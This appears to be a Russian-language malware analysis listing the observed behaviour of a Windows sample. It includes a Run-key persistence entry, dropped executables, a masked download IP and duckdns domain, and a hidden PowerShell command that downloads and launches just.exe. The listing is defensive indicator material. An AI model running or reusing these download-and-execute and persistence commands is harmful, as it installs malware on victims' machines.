Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'dhclnt' = '<SYSTEM32>\pcalua.exe -a %APPDATA%\dhclint.exe'
- http://91.##7.80.140/just.exe как %appdata%\just.exe
- addinprocess32.exe
- %TEMP%\abctfhghghghghž.sct
- %APPDATA%\just.exe
- %TEMP%\addinprocess32.exe
- %APPDATA%\dhclint.exe
- http://91.##7.80.140/just.exe
- DNS ASK tw####s.duckdns.org
- '%APPDATA%\just.exe'
- '%APPDATA%\dhclint.exe'
- '%TEMP%\addinprocess32.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://91.##7.80.140/just.exe','%APPDATA%\just.exe');Start-Process '%APPDATA%...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v dhclnt /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\dhclint.exe"
- '%WINDIR%\syswow64\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v dhclnt /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\dhclint.exe"